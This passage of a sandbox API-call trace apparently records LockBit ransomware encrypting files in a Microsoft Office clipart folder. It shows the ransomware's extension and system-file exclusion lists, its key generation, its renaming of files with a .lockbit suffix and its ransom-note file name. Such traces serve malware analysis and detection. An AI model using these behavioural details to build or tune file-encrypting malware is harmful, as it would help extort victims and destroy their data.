dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.070] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2030, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105846.WMF", cAlternateFileName="")) returned 1 [0139.070] lstrcmpiW (lpString1=".", lpString2="J0105846.WMF") returned -1 [0139.070] lstrcmpiW (lpString1="..", lpString2="J0105846.WMF") returned -1 [0139.070] PathFindExtensionW (pszPath="J0105846.WMF") returned=".WMF" [0139.070] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.070] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.071] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.071] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105846.WMF") returned 1 [0139.071] lstrcmpiW (lpString1="ntldr", lpString2="J0105846.WMF") returned 1 [0139.071] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105846.WMF") returned 1 [0139.071] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105846.WMF") returned -1 [0139.071] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105846.WMF") returned -1 [0139.071] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105846.WMF") returned 1 [0139.071] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105846.WMF") returned -1 [0139.071] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.071] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned=".WMF" [0139.071] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.072] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.072] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.072] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF.lockbit") returned 72 [0139.072] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.074] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.074] malloc (_Size=0x40068) returned 0x3df0008 [0139.074] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8240) returned 1 [0139.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.075] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.078] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.078] malloc (_Size=0xa6) returned 0x77d7a8 [0139.078] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.080] free (_Block=0x77d7a8) [0139.080] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.080] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.080] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2dc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105912.WMF", cAlternateFileName="")) returned 1 [0139.080] lstrcmpiW (lpString1=".", lpString2="J0105912.WMF") returned -1 [0139.080] lstrcmpiW (lpString1="..", lpString2="J0105912.WMF") returned -1 [0139.080] PathFindExtensionW (pszPath="J0105912.WMF") returned=".WMF" [0139.080] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.080] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.081] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.081] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105912.WMF") returned 1 [0139.081] lstrcmpiW (lpString1="ntldr", lpString2="J0105912.WMF") returned 1 [0139.082] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105912.WMF") returned 1 [0139.082] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105912.WMF") returned -1 [0139.082] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105912.WMF") returned -1 [0139.082] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105912.WMF") returned 1 [0139.082] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105912.WMF") returned -1 [0139.082] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.082] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned=".WMF" [0139.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.082] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.082] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.083] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.083] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.083] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF.lockbit") returned 72 [0139.083] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.083] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.083] malloc (_Size=0x40068) returned 0x3df0008 [0139.083] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11720) returned 1 [0139.083] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.084] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.084] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.084] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.084] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.088] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.088] malloc (_Size=0xa6) returned 0x77d7a8 [0139.088] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.089] free (_Block=0x77d7a8) [0139.089] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.089] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.089] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.089] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1204, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105974.WMF", cAlternateFileName="")) returned 1 [0139.089] lstrcmpiW (lpString1=".", lpString2="J0105974.WMF") returned -1 [0139.090] lstrcmpiW (lpString1="..", lpString2="J0105974.WMF") returned -1 [0139.090] PathFindExtensionW (pszPath="J0105974.WMF") returned=".WMF" [0139.090] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.090] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.090] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.091] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105974.WMF") returned 1 [0139.091] lstrcmpiW (lpString1="ntldr", lpString2="J0105974.WMF") returned 1 [0139.091] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105974.WMF") returned 1 [0139.091] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105974.WMF") returned -1 [0139.091] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105974.WMF") returned -1 [0139.091] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105974.WMF") returned 1 [0139.091] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105974.WMF") returned -1 [0139.091] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.091] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned=".WMF" [0139.091] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.092] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".mwb", 